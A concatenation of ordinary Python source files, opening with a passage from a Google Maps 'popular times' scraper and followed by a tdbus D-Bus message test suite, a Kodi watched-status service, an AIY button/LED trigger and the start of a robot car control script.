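# A minimal sketch (not part of the original module): a circle of radius 5
# centred at (12, 5) overhangs the right edge of the rectangle spanning
# x in [0, 10] and y in [0, 10] by three units, so an intersection is reported.
def _demo_rect_circle_collision():
    return rect_circle_collision(0, 10, 0, 10, 12, 5, 5)  # -> True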
def cover_rect_with_cicles(w, h, r):
"""
fully cover a rectangle of given width and height with
circles of radius r. This algorithm uses a hexagonal
honeycomb pattern to cover the area.
:param w: width of rectangle
    :param h: height of rectangle
:param r: radius of circles
:return: list of circle centers (x,y)
"""
# initialize result list
res = []
# horizontal distance between circle centers
x_dist = math.sqrt(3) * r
# vertical distance between circle centers
y_dist = 1.5 * r
# number of circles per row (different for even/odd rows)
cnt_x_even = math.ceil(w / x_dist)
cnt_x_odd = math.ceil((w - x_dist / 2) / x_dist) + 1
# number of rows
cnt_y = math.ceil((h - r) / y_dist) + 1
y_offs = 0.5 * r
for y in range(cnt_y):
if y % 2 == 0:
# shift even rows to the right
x_offs = x_dist / 2
cnt_x = cnt_x_even
else:
x_offs = 0
cnt_x = cnt_x_odd
for x in range(cnt_x):
res.append((x_offs + x * x_dist, y_offs + y * y_dist))
# top-right circle is not always required
if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):
res = res[0:-1]
return res
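# A minimal sketch (not part of the original module): covering a hypothetical
# 1000 x 600 rectangle with circles of radius 200. The helper returns the
# (x, y) offsets of the honeycomb centres (10 of them for these values), so
# that every point of the rectangle lies inside at least one circle.
def _demo_cover_rect_with_cicles():
    return cover_rect_with_cicles(1000, 600, 200)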
def get_circle_centers(b1, b2, radius):
"""
the function covers the area within the bounds with circles
:param b1: south-west bounds [lat, lng]
:param b2: north-east bounds [lat, lng]
:param radius: specified radius, adapt for high density areas
:return: list of circle centers that cover the area between lower/upper
"""
sw = Point(b1)
ne = Point(b2)
# north/east distances
dist_lat = geodesic(Point(sw[0], sw[1]), Point(ne[0], sw[1])).meters
dist_lng = geodesic(Point(sw[0], sw[1]), Point(sw[0], ne[1])).meters
circles = cover_rect_with_cicles(dist_lat, dist_lng, radius)
cords = [
GeodesicDistance(meters=c[0])
.destination(
GeodesicDistance(meters=c[1])
.destination(point=sw, bearing=90),
bearing=0
)[:2]
for c in circles
]
return cords
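# A minimal sketch (not part of the original module), using hypothetical
# south-west / north-east bounds: each returned entry is a (lat, lng) pair
# that can be fed into the "location" parameter of a nearby search request.
def _demo_circle_centers():
    sw = [48.132, 11.566]  # illustrative south-west corner
    ne = [48.142, 11.580]  # illustrative north-east corner
    return get_circle_centers(sw, ne, 500)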
def worker_radar():
"""
worker that gets coordinates of queue and starts radar search
:return:
"""
while True:
item = q_radar.get()
get_radar(item)
q_radar.task_done()
def get_radar(item):
_lat, _lng = item["pos"]
# places - nearby search
# https://developers.google.com/places/web-service/search?hl=en#PlaceSearchRequests
radar_str = NEARBY_URL.format(
_lat, _lng, params["radius"], "|".join(params["type"]), params["API_key"]
)
# is this a next page request?
if item["res"] > 0:
# possibly wait remaining time until next_page_token becomes valid
min_wait = 2 # wait at least 2 seconds before the next page request
sec_passed = time() - item["last_req"]
if sec_passed < min_wait:
sleep(min_wait - sec_passed)
radar_str += "&pagetoken=" + item["next_page_token"]
resp = json.loads(requests.get(radar_str, auth=('user', 'pass')).text)
check_response_code(resp)
radar = resp["results"]
item["res"] += len(radar)
if item["res"] >= 60:
logging.warning("Result limit in search radius reached, some data may get lost")
bounds = params["bounds"]
# retrieve google ids for detail search
for place in radar:
geo = place["geometry"]["location"]
if bounds["lower"]["lat"] <= geo["lat"] <= bounds["upper"]["lat"] \
and bounds["lower"]["lng"] <= geo["lng"] <= bounds["upper"]["lng"]:
# this isn't thread safe, but we don't really care,
# since in worst case a set entry is simply overwritten
g_places[place["place_id"]] = place
# if there are more results, schedule next page requests
if "next_page_token" in resp:
item["next_page_token"] = resp["next_page_token"]
item["last_req"] = time()
q_radar.put(item)
def worker_detail():
"""
worker that gets item of queue and starts detailed data retrieval
:return:
"""
while True:
item = q_detail.get()
get_detail(item)
q_detail.task_done()
def get_popularity_for_day(popularity):
"""
Returns popularity for day
:param popularity:
:return:
"""
# Initialize empty matrix with 0s
pop_json = [[0 for _ in range(24)] for _ in range(7)]
wait_json = [[0 for _ in range(24)] for _ in range(7)]
for day in popularity:
day_no, pop_times = day[:2]
if pop_times:
for hour_info in pop_times:
hour = hour_info[0]
pop_json[day_no - 1][hour] = hour_info[1]
                # check if the waiting-time string is available and convert it to minutes
if len(hour_info) > 5:
wait_digits = re.findall(r'\d+', hour_info[3])
if len(wait_digits) == 0:
wait_json[day_no - 1][hour] = 0
elif "min" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0])
elif "hour" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60
else:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 + int(wait_digits[1])
# day wrap
if hour_info[0] == 23:
day_no = day_no % 7 + 1
ret_popularity = [
{
"name": list(calendar.day_name)[d],
"data": pop_json[d]
} for d in range(7)
]
# waiting time only if applicable
ret_wait = [
{
"name": list(calendar.day_name)[d],
"data": wait_json[d]
} for d in range(7)
] if any(any(day) for day in wait_json) else []
# {"name" : "monday", "data": [...]} for each weekday as list
return ret_popularity, ret_wait
def index_get(array, *argv):
"""
checks if a index is available in the array and returns it
:param array: the data array
:param argv: index integers
:return: None if not available or the return value
"""
try:
for index in argv:
array = array[index]
return array
# there is either no info available or no popular times
    # TypeError: rating/rating_n/populartimes wrong or not available
except (IndexError, TypeError):
return None
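# A minimal sketch (not part of the original module): index_get walks nested
# indices and returns None instead of raising when a level is missing.
def _demo_index_get():
    data = [[10, [20, 30]]]
    return index_get(data, 0, 1, 1), index_get(data, 0, 5)  # -> (30, None)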
def add_optional_parameters(detail_json, detail, rating, rating_n, popularity, current_popularity, time_spent):
"""
check for optional return parameters and add them to the result json
:param detail_json:
:param detail:
:param rating:
:param rating_n:
:param popularity:
:param current_popularity:
:param time_spent:
:return:
"""
if rating:
detail_json["rating"] = rating
elif "rating" in detail:
detail_json["rating"] = detail["rating"]
if rating_n:
detail_json["rating_n"] = rating_n
if "international_phone_number" in detail:
detail_json["international_phone_number"] = detail["international_phone_number"]
if current_popularity:
detail_json["current_popularity"] = current_popularity
if popularity:
popularity, wait_times = get_popularity_for_day(popularity)
detail_json["populartimes"] = popularity
if wait_times:
detail_json["time_wait"] = wait_times
if time_spent:
detail_json["time_spent"] = time_spent
return detail_json
def get_populartimes_from_search(name, address):
"""
request information for a place and parse current popularity
:param name: name string
:param address: address string for checking if numbered address
:return:
"""
place_identifier = "{} {}".format(name, address)
params_url = {
"tbm": "map",
"tch": 1,
"hl": "en",
"q": urllib.parse.quote_plus(place_identifier),
"pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
"!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
"!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
"1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
"10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
"qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
"25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
"1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
"!3b1"
}
search_url = "https://www.google.de/search?" + "&".join(k + "=" + str(v) for k, v in params_url.items())
logging.info("searchterm: " + search_url)
# noinspection PyUnresolvedReferences
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
resp = urllib.request.urlopen(urllib.request.Request(url=search_url, data=None, headers=USER_AGENT),
context=gcontext)
data = resp.read().decode('utf-8').split('/*""*/')[0]
# find eof json
jend = data.rfind("}")
if jend >= 0:
data = data[:jend + 1]
jdata = json.loads(data)["d"]
jdata = json.loads(jdata[4:])
# check if proper and numeric address, i.e. multiple components and street number
is_proper_address = any(char.isspace() for char in address.strip()) and any(char.isdigit() for char in address)
info = index_get(jdata, 0, 1, 0 if is_proper_address else 1, 14)
rating = index_get(info, 4, 7)
rating_n = index_get(info, 4, 8)
popular_times = index_get(info, 84, 0)
# current_popularity is also not available if popular_times isn't
current_popularity = index_get(info, 84, 7, 1)
time_spent = index_get(info, 117, 0)
# extract wait times and convert to minutes
if time_spent:
nums = [float(f) for f in re.findall(r'\d*\.\d+|\d+', time_spent.replace(",", "."))]
contains_min, contains_hour = "min" in time_spent, "hour" in time_spent or "hr" in time_spent
time_spent = None
if contains_min and contains_hour:
time_spent = [nums[0], nums[1] * 60]
elif contains_hour:
time_spent = [nums[0] * 60, (nums[0] if len(nums) == 1 else nums[1]) * 60]
elif contains_min:
time_spent = [nums[0], nums[0] if len(nums) == 1 else nums[1]]
        if time_spent:
            time_spent = [int(t) for t in time_spent]
return rating, rating_n, popular_times, current_popularity, time_spent
def get_detail(place_id):
"""
    loads detail data for the given place id
:return:
"""
global results
# detail_json = get_populartimes(params["API_key"], place_id)
detail_json = get_populartimes_by_detail(params["API_key"], g_places[place_id])
if params["all_places"] or "populartimes" in detail_json:
results.append(detail_json)
def get_populartimes(api_key, place_id):
"""
sends request to detail to get a search string
and uses standard proto buffer to get additional information
on the current status of popular times
:return: json details
"""
# places api - detail search
# https://developers.google.com/places/web-service/details?hl=de
detail_str = DETAIL_URL.format(place_id, api_key)
resp = json.loads(requests.get(detail_str, auth=('user', 'pass')).text)
check_response_code(resp)
detail = resp["result"]
return get_populartimes_by_detail(api_key, detail)
def get_populartimes_by_detail(api_key, detail):
address = detail["formatted_address"] if "formatted_address" in detail else detail.get("vicinity", "")
detail_json = {
"id": detail["place_id"],
"name": detail["name"],
"address": address,
"types": detail["types"],
"coordinates": detail["geometry"]["location"]
}
detail_json = add_optional_parameters(detail_json, detail, *get_populartimes_from_search(
detail["name"], address
))
return detail_json
def check_response_code(resp):
"""
    check if the query quota has been surpassed or other errors occurred
:param resp: json response
:return:
"""
if resp["status"] == "OK" or resp["status"] == "ZERO_RESULTS":
return
if resp["status"] == "REQUEST_DENIED":
raise PopulartimesException("Google Places " + resp["status"],
"Request was denied, the API key is invalid.")
if resp["status"] == "OVER_QUERY_LIMIT":
raise PopulartimesException("Google Places " + resp["status"],
"You exceeded your Query Limit for Google Places API Web Service, "
"check https://developers.google.com/places/web-service/usage "
"to upgrade your quota.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "NOT_FOUND":
raise PopulartimesException("Google Places " + resp["status"],
"The place ID was not found and either does not exist or was retired.")
raise PopulartimesException("Google Places " + resp["status"],
"Unidentified error with the Places API, please check the response code")
def run(_params):
"""
wrap execution logic in method, for later external call
:return:
"""
global params, g_places, q_radar, q_detail, results
start = datetime.datetime.now()
# shared variables
params = _params
q_radar, q_detail = Queue(), Queue()
g_places, results = dict(), list()
logging.info("Adding places to queue...")
# threading for radar search
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_radar)
t.daemon = True
t.start()
# cover search area with circles
bounds = params["bounds"]
for lat, lng in get_circle_centers([bounds["lower"]["lat"], bounds["lower"]["lng"]], # southwest
[bounds["upper"]["lat"], bounds["upper"]["lng"]], # northeast
params["radius"]):
q_radar.put(dict(pos=(lat, lng), res=0))
q_radar.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
logging.info("{} places to process...".format(len(g_places)))
# threading for detail search and popular times
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_detail)
t.daemon = True
t.start()
for g_place_id in g_places:
q_detail.put(g_place_id)
q_detail.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
return results
|
test_message.py
|
#
# This file is part of python-tdbus. Python-tdbus is free software
# available under the terms of the MIT license. See the file "LICENSE" that
# was provided together with this source file for the licensing terms.
#
# Copyright (c) 2012 the python-tdbus authors. See the file "AUTHORS" for a
# complete list.
import logging
import math
from threading import Thread
import unittest
import gevent
from tdbus import GEventDBusConnection, DBUS_BUS_SESSION, DBusError, \
SimpleDBusConnection, method, DBusHandler
from tdbus.handler import signal_handler, dbus_object
from .base import BaseTest
logging.basicConfig()
IFACE_EXAMPLE = 'com.example'
class MessageTest(BaseTest):
def echo(self, signature=None, args=None):
reply = self.client.call_method('/', 'Echo', IFACE_EXAMPLE, signature, args,
destination=self.server_name, timeout=10)
return reply.get_args()
def echo_exception(self, signature=None, args=None):
try:
self.client.call_method('/', 'EchoException', IFACE_EXAMPLE, signature, args,
destination=self.server_name, timeout=10)
except DBusError as e:
return e
else:
            raise ValueError("Should have gotten a DBusError")
def test_arg_byte(self):
assert self.echo('y', (0,)) == (0,)
assert self.echo('y', (10,)) == (10,)
assert self.echo('y', (0xff,)) == (0xff,)
    def test_arg_byte_out_of_range(self):
        # each value must raise on its own; a single assertRaises block would
        # stop after the first failing call
        for value in (-1, 0x100):
            with self.assertRaises(DBusError):
                self.echo('y', (value,))
def test_arg_int16(self):
assert self.echo('n', (-0x8000,)) == (-0x8000,)
assert self.echo('n', (-10,)) == (-10,)
assert self.echo('n', (-0,)) == (-0,)
assert self.echo('n', (10,)) == (10,)
assert self.echo('n', (0x7fff,)) == (0x7fff,)
    def test_arg_int16_out_of_range(self):
        for value in (-0x8001, 0x8000):
            with self.assertRaises(DBusError):
                self.echo('n', (value,))
def test_arg_uint16(self):
assert self.echo('q', (0,)) == (0,)
assert self.echo('q', (10,)) == (10,)
assert self.echo('q', (0xffff,)) == (0xffff,)
    def test_arg_uint16_out_of_range(self):
        for value in (-1, 0x10000):
            with self.assertRaises(DBusError):
                self.echo('q', (value,))
def test_arg_int32(self):
assert self.echo('i', (-0x80000000,)) == (-0x80000000,)
assert self.echo('i', (-10,)) == (-10,)
assert self.echo('i', (0,)) == (0,)
assert self.echo('i', (10,)) == (10,)
assert self.echo('i', (0x7fffffff,)) == (0x7fffffff,)
    def test_arg_int32_out_of_range(self):
        for value in (-0x80000001, 0x80000000):
            with self.assertRaises(DBusError):
                self.echo('i', (value,))
def test_arg_uint32(self):
assert self.echo('u', (0,)) == (0,)
assert self.echo('u', (10,)) == (10,)
assert self.echo('u', (0xffffffff,)) == (0xffffffff,)
    def test_arg_uint32_out_of_range(self):
        for value in (-1, 0x100000000):
            with self.assertRaises(DBusError):
                self.echo('u', (value,))
def test_arg_int64(self):
assert self.echo('x', (-0x8000000000000000,)) == (-0x8000000000000000,)
assert self.echo('x', (-10,)) == (-10,)
assert self.echo('x', (0,)) == (0,)
assert self.echo('x', (10,)) == (10,)
assert self.echo('x', (0x7fffffffffffffff,)) == (0x7fffffffffffffff,)
    def test_arg_int64_out_of_range(self):
        for value in (-0x8000000000000001, 0x8000000000000000):
            with self.assertRaises(DBusError):
                self.echo('x', (value,))
def test_arg_uint64(self):
assert self.echo('t', (0,)) == (0,)
assert self.echo('t', (10,)) == (10,)
assert self.echo('t', (0xffffffffffffffff,)) == (0xffffffffffffffff,)
    def test_arg_uint64_out_of_range(self):
        for value in (-1, 0x10000000000000000):
            with self.assertRaises(DBusError):
                self.echo('t', (value,))
def test_arg_boolean(self):
assert self.echo('b', (False,)) == (False,)
assert self.echo('b', (True,)) == (True,)
assert self.echo('b', (0,)) == (False,)
assert self.echo('b', (1,)) == (True,)
assert self.echo('b', ([],)) == (False,)
assert self.echo('b', ([1],)) == (True,)
assert self.echo('b', ({},)) == (False,)
assert self.echo('b', ({"": ""},)) == (True,)
assert self.echo('b', ((),)) == (False,)
        assert self.echo('b', ((1,),)) == (True,)
assert self.echo('b', (None,)) == (False,)
def test_arg_double(self):
assert self.echo('d', (-1e100,)) == (-1e100,)
assert self.echo('d', (-1.0,)) == (-1.0,)
assert self.echo('d', (-1e-100,)) == (-1e-100,)
assert self.echo('d', (0.0,)) == (0.0,)
assert self.echo('d', (1e-100,)) == (1e-100,)
assert self.echo('d', (1.0,)) == (1.0,)
assert self.echo('d', (1e100,)) == (1e100,)
def test_arg_double_special(self):
inf = 1e1000
assert self.echo('d', (inf,)) == (inf,)
assert self.echo('d', (-inf,)) == (-inf,)
assert self.echo('d', (1 / inf,)) == (1 / inf,) # 0
assert self.echo('d', (1 / -inf,)) == (1 / -inf,) # -0
nan = inf / inf
assert math.isnan(self.echo('d', (nan,))[0]) # note: nan != nan
def test_arg_string(self):
assert self.echo('s', ('',)) == ('',)
assert self.echo('s', ('foo',)) == ('foo',)
def test_arg_string_unicode(self):
assert self.echo('s', (u'foo \u20ac',)) == (u'foo \u20ac',)
def test_arg_object_path(self):
assert self.echo('o', ('/foo/bar',)) == ('/foo/bar',)
def test_arg_object_path_unicode(self):
assert self.echo('o', (u'/foo/bar',)) == (u'/foo/bar',)
    def test_arg_invalid_object_path(self):
        for path in ('foo', 'foo/bar', '/foo/bar/', '/foo//bar/', '/foo bar/'):
            with self.assertRaises(DBusError):
                self.echo('o', (path,))
def test_arg_signature(self):
assert self.echo('g', ('iii',)) == ('iii',)
def test_arg_signature_unicode(self):
assert self.echo('g', (u'iii',)) == (u'iii',)
    def test_arg_invalid_signature(self):
        for signature, args in (('*', (1,)),
                                ('(i', (1,)),
                                ('i' * 256, (1,) * 256)):
            with self.assertRaises(DBusError):
                self.echo(signature, args)
        def nested_tuple(d, v):
            if d == 0:
                return (v,)
            return (nested_tuple(d - 1, v),)
        with self.assertRaises(DBusError):
            self.echo('(' * 33 + 'i' + ')' * 33, nested_tuple(33, 1))
        with self.assertRaises(DBusError):
            self.echo('a' * 33 + 'i', nested_tuple(33, 1))
def test_arg_variant(self):
assert self.echo('v', (('i', 10),)) == (('i', 10),)
assert self.echo('v', (('ai', [1, 2, 3]),)) == (('ai', [1, 2, 3]),)
def test_arg_variant_unicode(self):
assert self.echo('v', ((u'i', 10),)) == ((u'i', 10),)
assert self.echo('v', ((u'ai', [1, 2, 3]),)) == ((u'ai', [1, 2, 3]),)
def test_arg_invalid_variant(self):
with self.assertRaises(DBusError):
self.echo('v', (('ii', (1, 2)),))
def test_arg_multi(self):
assert self.echo('ii', (1, 2)) == (1, 2)
assert self.echo('iii', (1, 2, 3)) == (1, 2, 3)
def test_arg_too_few(self):
with self.assertRaises(DBusError):
self.echo('ii', (1,))
def test_arg_too_many(self):
with self.assertRaises(DBusError):
self.echo('ii', (1, 2, 3))
def test_arg_struct(self):
assert self.echo('(i)', ((1,),)) == ((1,),)
assert self.echo('(ii)', ((1, 2),)) == ((1, 2),)
assert self.echo('(iii)', ((1, 2, 3),)) == ((1, 2, 3),)
assert self.echo('(((((i)))))', ((((((1,),),),),),)) == \
((((((1,),),),),),)
    def test_arg_invalid_struct(self):
        for signature in ('(i', '(i}'):
            with self.assertRaises(DBusError):
                self.echo(signature, ((10,),))
def test_arg_array(self):
assert self.echo('ai', ([1],)) == ([1],)
assert self.echo('ai', ([1, 2],)) == ([1, 2],)
assert self.echo('ai', ([1, 2, 3],)) == ([1, 2, 3],)
assert self.echo('a(ii)', ([(1, 2), (3, 4)],)) == ([(1, 2), (3, 4)],)
assert self.echo('av', ([('i', 10), ('s', 'foo')],)) == \
([('i', 10), ('s', 'foo')],)
def test_arg_dict(self):
assert self.echo('a{ss}', ({'foo': 'bar'},)) == ({'foo': 'bar'},)
assert self.echo('a{ss}', ({'foo': 'bar', 'baz': 'qux'},)) == \
({'foo': 'bar', 'baz': 'qux'},)
assert self.echo('a{si}', ({'foo': 10},)) == ({'foo': 10},)
assert self.echo('a{ii}', ({1: 10},)) == ({1: 10},)
def test_arg_byte_array(self):
assert self.echo('ay', (b'foo',)) == (b'foo',)
def test_arg_byte_array_illegal_type(self):
with self.assertRaises(DBusError):
self.echo('ay', ([1, 2, 3],))
    def test_exceptions(self):
        error = self.echo_exception('ss', ['SpecialException', 'message'])
        print(error, type(error))
        self.assertEqual(error.__class__.__name__, 'SpecialException')
        self.assertEqual(error.type, 'SpecialException')
        self.assertEqual(error.args[0], 'message')
        assert isinstance(error, DBusError)
        error = self.echo_exception('s', ['Missing second argument, which raises a ValueError'])
        self.assertEqual(error.__class__.__name__, 'ValueError')
        self.assertEqual(error.type, 'ValueError')
        self.assertIn(error.args[0], ('need more than 1 value to unpack',
                                      'not enough values to unpack (expected 2, got 1)'))
        assert isinstance(error, DBusError)
class EchoHandlerBase(object):
def __init__(self, signal_handler=None):
super(EchoHandlerBase, self).__init__()
self.signal_handler = signal_handler
@method(interface=IFACE_EXAMPLE, member="Echo")
def echo_method(self, message):
self.set_response(message.get_signature(), message.get_args())
@method(interface=IFACE_EXAMPLE, member="EchoException")
def echo_exception(self, message):
name, message = message.get_args()
raise type(str(name), (Exception,), {})(message)
@signal_handler(interface=IFACE_EXAMPLE, member="Echo")
def echo_signal(self, message):
if self.signal_handler:
self.signal_handler(message)
@method(interface=IFACE_EXAMPLE, member="Stop")
def stop(self, _):
self.connection.stop()
class EchoHandlerInherit(EchoHandlerBase, DBusHandler):
pass
@dbus_object
class EchoHandlerDecorator(EchoHandlerBase):
pass
class TestMessageASimple(unittest.TestCase, MessageTest):
@classmethod
def dbus_server(cls, conn):
conn.dispatch()
@classmethod
def setUpClass(cls):
super(TestMessageASimple, cls).setUpClass()
handler = EchoHandlerInherit()
conn = SimpleDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
cls.server_name = conn.get_unique_name()
cls.server = Thread(target=cls.dbus_server, args=(conn,))
cls.server.start()
cls.client = SimpleDBusConnection(DBUS_BUS_SESSION)
@classmethod
def tearDownClass(cls):
cls.client.call_method('/', 'Stop', IFACE_EXAMPLE, destination=cls.server_name)
cls.server.join()
super(TestMessageASimple, cls).tearDownClass()
class TestMessageGEvent(unittest.TestCase, MessageTest):
@classmethod
def setUpClass(cls):
super(TestMessageGEvent, cls).setUpClass()
handler = EchoHandlerInherit()
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
cls.server_name = conn.get_unique_name()
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
class TestMessageDecorated(unittest.TestCase, MessageTest):
@classmethod
def setUpClass(cls):
super(TestMessageDecorated, cls).setUpClass()
handler = EchoHandlerDecorator()
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
cls.server_name = conn.get_unique_name()
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
class TestMessageName(unittest.TestCase, MessageTest):
@classmethod
def setUpClass(cls):
super(TestMessageName, cls).setUpClass()
cls.server_name = "org.tdbus.Test"
handler = EchoHandlerInherit()
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.register_name(cls.server_name)
conn.add_handler(handler)
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
class TestMessageSignal(unittest.TestCase, MessageTest):
last_message = None
@classmethod
def setUpClass(cls):
super(TestMessageSignal, cls).setUpClass()
cls.server_name = "org.tdbus.Test"
def signal_handler_f(message):
logging.getLogger('tdbus').info(message)
cls.last_message = message
handler = EchoHandlerInherit(signal_handler_f)
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.register_name(cls.server_name)
conn.add_handler(handler)
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
def echo(self, signature=None, args=None):
self.client.send_signal('/', 'Echo', IFACE_EXAMPLE, signature, args,
destination=self.server_name)
        # wait a moment so the server can process the message
gevent.sleep(0.1)
return self.last_message.get_args()
class TestMessageSignalMatched(unittest.TestCase, MessageTest):
last_message = None
@classmethod
def setUpClass(cls):
super(TestMessageSignalMatched, cls).setUpClass()
cls.server_name = "org.tdbus.Test"
def signal_handler_f(message):
logging.getLogger('tdbus').info(message)
cls.last_message = message
handler = EchoHandlerInherit(signal_handler_f)
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
conn.subscribe_to_signals()
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
def echo(self, signature=None, args=None):
self.client.send_signal('/', 'Echo', IFACE_EXAMPLE, signature, args)
        # wait a moment so the server can process the message
gevent.sleep(0.01)
return self.last_message.get_args()
|
service.py
|
# -*- coding: utf-8 -*-
def start(api):
core = api.core
monitor = core.kodi.xbmc.Monitor()
class XBMCPlayer(core.kodi.xbmc.Player):
        def onPlayBackStarted(self): pass
        def onPlayBackEnded(self): pass
        def onPlayBackStopped(self): pass
player = XBMCPlayer()
watched = lambda: None
watched.playing_imdb_id = None
watched.play_count = None
watched.time_played = None
watched.total_time = None
update = lambda: None
update.last_check = None
def reset_vars():
watched.playing_imdb_id = None
watched.play_count = None
watched.time_played = None
watched.total_time = None
def update_playing_imdb_id(retry):
reset_vars()
core.kodi.xbmc.sleep(5000)
try:
video_meta = player.getVideoInfoTag()
watched.playing_imdb_id = video_meta.getIMDBNumber()
watched.play_count = video_meta.getPlayCount()
except: update_playing_imdb_id(retry=False) if retry else None
def mark_as_watched():
try:
if not watched.playing_imdb_id or not watched.time_played or not watched.total_time:
return
percent_played = watched.time_played / watched.total_time
if percent_played < 0.90:
return
core.profile(core, core.utils.DictAsObject({ 'type': 'mark_as_watched', 'id': watched.playing_imdb_id, 'silent': True }))
finally:
reset_vars()
player.onPlayBackStarted = lambda: update_playing_imdb_id(retry=True)
player.onPlayBackEnded = lambda: mark_as_watched()
player.onPlayBackStopped = lambda: mark_as_watched()
while not monitor.abortRequested():
if monitor.waitForAbort(2):
break
if not update.last_check or core.time.time() - update.last_check >= 3600:
update.last_check = core.time.time()
thread = core.threading.Thread(target=core.provider, args=(core, core.utils.DictAsObject({ 'type': 'new_version_check', 'silent': True })))
thread.start()
if watched.play_count and watched.play_count > 0:
continue
has_video = (core.kodi.xbmc.getCondVisibility('VideoPlayer.Content(movies)') or core.kodi.xbmc.getCondVisibility('VideoPlayer.Content(episodes)'))
has_video_duration = core.kodi.xbmc.getCondVisibility('Player.HasDuration')
if not has_video or not has_video_duration:
continue
if not watched.total_time:
try: watched.total_time = player.getTotalTime()
except: pass
try: watched.time_played = player.getTime()
except: pass
|
aiy_trigger.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import threading
from gpiozero import Button
from gpiozero import LED
BLINK_ON_TIME_S = 0.5
BLINK_OFF_TIME_S = 0.5
BUTTON_HOLD_TIME_S = 5
BASE_GPIO_FILE = '/sys/module/gpio_aiy_io/drivers/platform:gpio-aiy-io/gpio-aiy-io/gpio/gpiochip*/base'
BASE_GPIO = int(subprocess.run('cat %s' % BASE_GPIO_FILE, shell=True, capture_output=True).stdout.strip())
BUTTON_GPIO = 23
BUTTON_LED_GPIO = 25
def _write(path, data):
with open(path, 'w') as file:
file.write(str(data))
class OnboardLED(object):
def _run(self, on_time, off_time):
gpio = BASE_GPIO + (13, 14)[self._led]
_write('/sys/class/gpio/export', gpio)
try:
while not self._event.is_set():
_write('/sys/class/gpio/AIY_LED%d/direction' % self._led, 'low')
self._event.wait(on_time)
_write('/sys/class/gpio/AIY_LED%d/direction' % self._led, 'high')
self._event.wait(off_time)
finally:
_write('/sys/class/gpio/unexport', gpio)
def __init__(self, led):
self._led = led
self._thread = None
def blink(self, on_time, off_time):
self._event = threading.Event()
self._thread = threading.Thread(target=self._run, args=(on_time, off_time), daemon=True)
self._thread.start()
def off(self):
if self._thread:
self._event.set()
self._thread.join()
self._thread = None
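# A minimal usage sketch (not part of the original module); it assumes AIY
# hardware where the onboard LED is exposed through the sysfs GPIO interface.
def _demo_onboard_led():
    led = OnboardLED(0)
    led.blink(on_time=BLINK_ON_TIME_S, off_time=BLINK_OFF_TIME_S)
    # ... wait for some condition ...
    led.off()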
class AiyTrigger(object):
"""Trigger interface for AIY kits."""
def __init__(self, triggered):
self._triggered = triggered
self._active = False
if os.path.exists('/sys/class/gpio/gpiochip%d' % BASE_GPIO):
self._led = OnboardLED(0)
else:
self._led = LED(BUTTON_LED_GPIO)
self._button = Button(BUTTON_GPIO, hold_time=BUTTON_HOLD_TIME_S)
self._button.when_held = triggered
def Close(self):
self._led.off()
def SetActive(self, active):
if active:
self._led.blink(on_time=BLINK_ON_TIME_S, off_time=BLINK_OFF_TIME_S)
else:
self._led.off()
|
main.py
|
import multiprocessing as mp
from multiprocessing import Process, Value, Array
import time
from UI.uimain import showui
from opencv.main import cv
from motor.main import line_run
from config import *
from control.maincontrol import CarControlRun, FlagRun
from init import init
if __name__ == '__main__':
    # shared queue for image-processing results
img_res_q = mp.Queue()
    # dynamically shared parameter values
    # status
    CarStatus = Value('i', -1)  # car status: -1 stopped, 0 main-control takeover, 1 line following, 2 calibration, 3 executing task
    LinerSpeed = Value('i', conf_base_speed)  # shared between UI and motor
